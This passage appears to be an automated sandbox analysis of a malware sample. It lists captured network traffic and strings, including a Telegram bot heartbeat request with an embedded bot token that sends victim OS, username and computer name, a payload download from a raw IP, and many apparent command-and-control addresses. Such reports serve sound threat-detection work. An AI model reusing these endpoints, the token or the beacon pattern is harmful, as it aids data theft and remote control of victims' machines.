                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: ip-api.com
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.208.221:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drString found in binary or memory: http://127.0.0.1:6787/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6787/ing=no
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.126.132.141:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.88.44.159:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.26.128.6:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/get
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.119.118.59:80802
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.142.58.127:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.142.58.127:80Pk
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.189.109.146:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://212.6.44.53:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://216.250.190.139:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.224.102.6:8001
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.248.176.37:180
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.61.136.13:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.61.136.52:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://66.42.56.128:80
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://82.147.85
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://82.147.85.194
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://82.147.85.194/byte/
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line?fields=query
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/i?
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.41.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co(=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://13.231.21.109:443
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://164.90.185.9:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://18.178.28.151:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://185.217.98.121:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://192.99.196.191:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://44.228.161.50:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://64.227.21.98:443
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
